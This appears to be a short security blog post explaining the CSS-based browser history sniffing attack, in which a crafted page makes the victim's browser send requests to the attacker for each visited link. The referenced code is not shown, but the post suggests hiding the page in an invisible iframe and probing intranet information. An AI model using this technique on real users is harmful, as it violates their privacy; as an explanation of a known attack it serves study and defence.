The act of “stealing” browser history using various web technologies has been around for a while.  You may have seen this version of the attack in slides by Jeremiah Grossman speaking at HITBSecConf 2008 and we followed a PoC and writeup posted by RSnake.

So in short, the gist is this…

1. Victim requests a page from Attacker
2. Attacker sends a specially crafted HTML page containing links for all the URLs that he would like to check as well as corresponding unique styles.
3. The Victim’s browser renders the page, firing off a CSS style for each visited link
4. The CSS makes a GET request using background:url(location);
5. The attacker handles the GET and uses it to determine the URL that was hit
6. The attacker sends back a 404 to keep the browser moving

Easy enough.  Now, let’s make it convenient to alter/switch the URL lists.  Here’s the code.

Just to be clear, I don’t really consider this “stealing” the history.  It’s more like playing a question game, where if you ask the right questions, the client will confirm.  That said, we CAN ask a lot of questions.

Suggestions:

• Play with iframing it into another page invisibly
• Play with it in Firefox (which seems to rerender the styles as URLs are hit in other tabs
• Attempt to gain intranet information

Code browser, Code, CSS, HTML, metasploit